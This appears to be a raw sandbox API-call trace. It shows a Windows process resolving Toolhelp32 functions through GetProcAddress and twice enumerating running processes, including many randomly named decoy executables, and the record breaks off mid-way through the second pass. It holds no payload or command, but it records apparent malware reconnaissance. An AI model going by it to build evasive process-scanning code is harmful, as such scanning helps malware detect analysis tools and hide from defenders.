WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32First") returned 0x7697443d [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1352d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1352d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x1352d0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x1352d0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.271] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1352d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0101.271] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0101.271] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0101.276] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.285] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.286] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.289] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.298] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.304] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.349] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.350] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.351] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.352] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.353] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.354] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.356] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.357] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.358] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.359] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.360] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.361] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.363] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.364] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.365] CloseHandle (hObject=0xc4) returned 1 [0101.365] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0101.370] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.371] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 